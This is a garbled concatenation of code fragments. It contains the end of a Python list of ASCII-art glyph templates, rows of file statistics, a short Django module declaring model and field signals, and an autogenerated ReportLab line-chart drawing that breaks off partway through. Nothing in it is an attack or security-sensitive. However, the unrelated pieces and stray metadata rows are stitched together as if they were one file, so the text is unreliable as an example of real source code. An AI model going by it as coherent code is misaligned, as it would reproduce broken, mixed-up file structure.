"\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj} {cj}{cj}\n {cj}{cj} {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj} {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj} {cj}{cj}{cj}{cj}\n {cj}{cj}{cj} {cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}\n {cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
]
| 35.709016
| 484
| 0.206856
| 3,560
| 26,139
| 2.070506
| 0.108427
| 0.656085
| 0.692715
| 0.631665
| 0.753358
| 0.730159
| 0.724732
| 0.703975
| 0.703975
| 0.699769
| 0
| 0.015688
| 0.468381
| 26,139
| 731
| 485
| 35.757866
| 0.371978
| 0
| 0
| 0.548433
| 0
| 0.10114
| 0.742875
| 0.197253
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0be643dccc3fa31538ee1b3d5f3e6cca2630d725
| 962
|
py
|
Python
|
data/train/python/0be643dccc3fa31538ee1b3d5f3e6cca2630d725signals.py
|
harshp8l/deep-learning-lang-detection
|
2a54293181c1c2b1a2b840ddee4d4d80177efb33
|
[
"MIT"
] | 84
|
2017-10-25T15:49:21.000Z
|
2021-11-28T21:25:54.000Z
|
data/train/python/0be643dccc3fa31538ee1b3d5f3e6cca2630d725signals.py
|
vassalos/deep-learning-lang-detection
|
cbb00b3e81bed3a64553f9c6aa6138b2511e544e
|
[
"MIT"
] | 5
|
2018-03-29T11:50:46.000Z
|
2021-04-26T13:33:18.000Z
|
data/train/python/0be643dccc3fa31538ee1b3d5f3e6cca2630d725signals.py
|
vassalos/deep-learning-lang-detection
|
cbb00b3e81bed3a64553f9c6aa6138b2511e544e
|
[
"MIT"
] | 24
|
2017-11-22T08:31:00.000Z
|
2022-03-27T01:22:31.000Z
|
import django.dispatch
pre_model_creation = django.dispatch.Signal(providing_args=['new_model'])
post_model_creation = django.dispatch.Signal(providing_args=['new_model'])
pre_model_update = django.dispatch.Signal(providing_args=['old_model','new_model'])
post_model_update = django.dispatch.Signal(providing_args=['old_model','new_model'])
pre_model_delete = django.dispatch.Signal(providing_args=['old_model'])
post_model_delete = django.dispatch.Signal(providing_args=['old_model'])
pre_field_creation = django.dispatch.Signal(providing_args=['new_field'])
post_field_creation = django.dispatch.Signal(providing_args=['new_field'])
pre_field_update = django.dispatch.Signal(providing_args=['old_field','new_field'])
post_field_update = django.dispatch.Signal(providing_args=['old_field','new_field'])
pre_field_delete = django.dispatch.Signal(providing_args=['old_field'])
post_field_delete = django.dispatch.Signal(providing_args=['old_field'])
| 35.62963
| 84
| 0.808732
| 131
| 962
| 5.541985
| 0.114504
| 0.250689
| 0.330579
| 0.479339
| 0.914601
| 0.914601
| 0.914601
| 0.914601
| 0.914601
| 0.330579
| 0
| 0
| 0.053015
| 962
| 26
| 85
| 37
| 0.796926
| 0
| 0
| 0
| 0
| 0
| 0.149688
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f0bae7d0503264e02103de20ed0f353027225814
| 33,385
|
py
|
Python
|
tests/charts-out/test_graphics_charts_lineplots_sample1a.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | 1
|
2020-05-21T23:34:55.000Z
|
2020-05-21T23:34:55.000Z
|
tests/charts-out/test_graphics_charts_lineplots_sample1a.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
tests/charts-out/test_graphics_charts_lineplots_sample1a.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
#Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, Line, String, PolyLine, Polygon
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
def __init__(self,width=400,height=200,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self.transform = (1,0,0,1,0,0)
self.add(Rect(50,50,300,125,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,350,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,50,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(110,50,110,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(170,50,170,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(230,50,230,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(290,50,290,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(350,50,350,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,50,45)
v0.add(String(-2.5,-10,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,110,45)
v0.add(String(-2.5,-10,'1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,170,45)
v0.add(String(-2.5,-10,'2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,230,45)
v0.add(String(-2.5,-10,'3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,290,45)
v0.add(String(-2.5,-10,'4',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,350,45)
v0.add(String(-2.5,-10,'5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Line(50,50,50,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,45,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,67.85714,45,67.85714,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,85.71429,45,85.71429,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,103.5714,45,103.5714,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,121.4286,45,121.4286,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,139.2857,45,139.2857,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,157.1429,45,157.1429,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,175,45,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,50)
v0.add(String(-5,-4,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,67.85714)
v0.add(String(-5,-4,'1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,85.71429)
v0.add(String(-5,-4,'2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,103.5714)
v0.add(String(-5,-4,'3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,121.4286)
v0.add(String(-5,-4,'4',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,139.2857)
v0.add(String(-5,-4,'5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,157.1429)
v0.add(String(-5,-4,'6',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,175)
v0.add(String(-5,-4,'7',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(PolyLine(points=[110,67.85714,170,85.71429,200,67.85714,230,103.5714,290,139.2857],strokeColor=Color(1,0,0,1),strokeWidth=2,strokeLineCap=0,strokeLineJoin=1,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(PolyLine(points=[110,85.71429,170,103.5714,200,85.71429,260,139.2857,290,157.1429],strokeColor=Color(0,0,1,1),strokeWidth=4,strokeLineCap=0,strokeLineJoin=1,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,110,67.85714)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,170,85.71429)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,200,67.85714)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,230,103.5714)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,290,139.2857)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
